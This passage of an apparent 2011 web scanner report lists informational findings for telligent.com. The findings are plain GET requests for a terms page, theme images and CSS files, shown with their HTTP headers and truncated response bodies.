Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a40+GMT; expires=Sun, 26-Feb-2012 23:22:40 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:39 GMT
Connection: close
Content-Length: 72039


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.483. http://telligent.com/terms_of_use.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /terms_of_use.aspx

Request

GET /terms_of_use.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a02+GMT; expires=Sun, 26-Feb-2012 23:23:02 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:02 GMT
Connection: close
Content-Length: 54312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.484. http://telligent.com/themes/Custom/images/background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/background.png

Request

GET /themes/Custom/images/background.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 27 Jan 2010 16:42:22 GMT
Accept-Ranges: bytes
ETag: "e1a812b36f9fca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a49+GMT; expires=Sun, 26-Feb-2012 22:04:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:49 GMT
Content-Length: 1460

.PNG
.
...IHDR................?....sBIT.....O....    pHYs..
...
..B.4.....tEXtCreation Time.11/16/09..".....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:
...[SNIP]...

7.485. http://telligent.com/themes/Custom/images/footer-background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/footer-background.png

Request

GET /themes/Custom/images/footer-background.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 04 Dec 2009 20:05:48 GMT
Accept-Ranges: bytes
ETag: "e8bda2b1d75ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a53+GMT; expires=Sun, 26-Feb-2012 22:04:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:53 GMT
Content-Length: 2701

.PNG
.
...IHDR.......3......Z......sBIT.....O....    pHYs..
...
..B.4.....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmln
...[SNIP]...

7.486. http://telligent.com/themes/Custom/images/icon-phone-white.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/icon-phone-white.png

Request

GET /themes/Custom/images/icon-phone-white.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a45+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 03 Dec 2009 22:38:14 GMT
Accept-Ranges: bytes
ETag: "776cfc4c6974ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a51+GMT; expires=Sun, 26-Feb-2012 22:04:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:51 GMT
Content-Length: 526

.PNG
.
...IHDR.....................sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/03/09.......kIDAT(.c..|..t..g.k...1.tV"A...`......5EL.....l&......W..
...[SNIP]...

7.487. http://telligent.com/themes/Custom/images/menu-tabs-background-right-corner.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/menu-tabs-background-right-corner.png

Request

GET /themes/Custom/images/menu-tabs-background-right-corner.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a46+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 02 Dec 2009 21:24:27 GMT
Accept-Ranges: bytes
ETag: "ff40f5d39573ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a52+GMT; expires=Sun, 26-Feb-2012 22:04:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:52 GMT
Content-Length: 1853

.PNG
.
...IHDR.......I.......Po....sBIT.....O....    pHYs...........~.....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe
...[SNIP]...

7.488. http://telligent.com/themes/Custom/images/menu-tabs-background.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/menu-tabs-background.gif

Request

GET /themes/Custom/images/menu-tabs-background.gif HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a46+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Wed, 27 Jan 2010 16:43:47 GMT
Accept-Ranges: bytes
ETag: "178f7ee56f9fca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a52+GMT; expires=Sun, 26-Feb-2012 22:04:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:52 GMT
Content-Length: 161

GIF89a..I.....Lh...T..L..?j....7\~Gy.R..W..;b.O..Cp.R..2TtK~.M..Et...........................................!.......,......I.....$....h..,*.H.,.0.G.......pH...;

7.489. http://telligent.com/themes/Custom/images/search-background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/search-background.png

Request

GET /themes/Custom/images/search-background.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a46+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 03 Dec 2009 00:23:02 GMT
Accept-Ranges: bytes
ETag: "34b71c6ae73ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a51+GMT; expires=Sun, 26-Feb-2012 22:04:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:51 GMT
Content-Length: 1182

.PNG
.
...IHDR.............J......sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/02/09.=......IDATx....o.E......8.$...I.m.DN
.Tr.B..........3......T5
...[SNIP]...

7.490. http://telligent.com/themes/Custom/images/tab-selected-home.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/Custom/images/tab-selected-home.png

Request

GET /themes/Custom/images/tab-selected-home.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a46+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 03 Dec 2009 02:24:50 GMT
Accept-Ranges: bytes
ETag: "29b222cabf73ca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a52+GMT; expires=Sun, 26-Feb-2012 22:04:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:52 GMT
Content-Length: 4047

.PNG
.
...IHDR.......I......;......sBIT.....O....    pHYs..
...
..B.4.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/02/09.=.....,IDATx..._l..}.3.GR.-.-;ql.<..\Gj....n.......A.....S..A.
...[SNIP]...

7.491. http://telligent.com/themes/cms/fiji/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/cms/fiji/css/DynamicStyle.aspx

Request

GET /themes/cms/fiji/css/DynamicStyle.aspx?SectionID=691 HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 0


7.492. http://telligent.com/themes/cms/fiji/css/fourroads-cms.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/cms/fiji/css/fourroads-cms.css

Request

GET /themes/cms/fiji/css/fourroads-cms.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 20 Jan 2010 16:37:42 GMT
Accept-Ranges: bytes
ETag: "6d25f8e2ee99ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 484

....admin-bar .navigation-item .internal-link-sub { padding-left: 5px; margin-left: 5px; font-weight: bold; }
.admin-bar .navigation-item .internal-link-sub.select-revision { padding-left: 5px; paddi
...[SNIP]...

7.493. http://telligent.com/themes/cms/fiji/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/cms/fiji/css/screen.css

Request

GET /themes/cms/fiji/css/screen.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 20 Jan 2010 16:37:42 GMT
Accept-Ranges: bytes
ETag: "c987fae2ee99ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT; expires=Sun, 26-Feb-2012 22:04:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:38 GMT
Content-Length: 84

...@import url('../../../fiji/css/screen.css');
@import url('fourroads-cms.css');

7.494. http://telligent.com/themes/fiji/css/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/base.css

Request

GET /themes/fiji/css/base.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 11 Jan 2010 22:53:08 GMT
Accept-Ranges: bytes
ETag: "0a2a2d71093ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT; expires=Sun, 26-Feb-2012 22:04:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:41 GMT
Content-Length: 29303

html, body { margin: 0; padding: 0; text-align: left; font-size: 12px; font-family:Arial; color: #333; }
a:link, a:visited, a:active { outline: none; color: #06d; text-decoration: none; font-weight:
...[SNIP]...

7.495. http://telligent.com/themes/fiji/css/content-fragments-core.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-core.css

Request

GET /themes/fiji/css/content-fragments-core.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 01 Feb 2010 21:10:42 GMT
Accept-Ranges: bytes
ETag: "0352383a3ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a43+GMT; expires=Sun, 26-Feb-2012 22:04:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:42 GMT
Content-Length: 46321

.../* $Title
/******************************/
.content-fragment.title { display: none; }

/* $Bread Crumbs
/******************************/
.content-fragment.bread-crumbs { margin: 0; }

/* $E
...[SNIP]...

7.496. http://telligent.com/themes/fiji/css/content-fragments-forums.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-forums.css

Request

GET /themes/fiji/css/content-fragments-forums.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a41+GMT

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 17 Dec 2009 21:54:42 GMT
Accept-Ranges: bytes
ETag: "0bd9189637fca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a43+GMT; expires=Sun, 26-Feb-2012 22:04:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:42 GMT
Content-Length: 49130

/* $Forum Title
/******************************/
.content-fragment.forum-title { display: none; }

/* $Forum Banner
/******************************/
.content-fragment.forum-banner { margin: 0; }
...[SNIP]...

7.497. http://telligent.com/themes/fiji/css/content-fragments-groups.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/fiji/css/content-fragments-groups.css

Request

GET /themes/fiji/css/content-fragments-groups.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
